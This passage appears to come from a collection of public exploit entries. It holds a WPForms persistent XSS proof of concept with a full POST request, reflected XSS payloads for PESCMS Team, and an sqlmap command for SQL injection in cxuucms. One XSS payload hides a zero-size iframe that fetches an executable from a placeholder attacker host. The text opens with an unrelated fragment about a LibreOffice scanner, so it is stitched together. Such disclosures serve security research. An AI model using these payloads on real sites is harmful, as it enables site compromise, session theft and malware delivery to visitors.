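The scanner deliberately walks every element rather than only text:section-source, since the advisory notes that LibreOffice resolves XLinks generally; relative hrefs into the package itself (Pictures/..., which legitimate documents use for embedded images) are left alone.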
23. #Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
#Exploit Author : ZwX
#Exploit Date : 2020-10-23
#Vendor Homepage : https://wpforms.com/
#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip

[+] Description Vulnerability:
==============================
A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms], which affects version 1.6.3.1 and lower. To exploit the vulnerability it is necessary to be authenticated; the attacker can then hide JavaScript code without the knowledge of the owner of the site.

[+] Proof Of Concept:
=====================

# HTML Code #
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea>
<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;"/></textarea>

# Method POST #
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7081
Origin: http://localhost
Connection: close

action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou 
message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de 
ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a # URL Proof Of Concept # http://localhost/?wpforms_form_preview=990
24. # Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:
?g=Team&m=Task&a=my&status=3&id=
?g=Team&m=Task&a=my&status=0&id=
?g=Team&m=Task&a=my&status=1&id=
?g=Team&m=Task&a=my&status=10&id=

Please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

Now I input the payload: "><ScRiPt>alert(1)</ScRiPt>
25. # Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1

Verification with SQLMAP:
sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname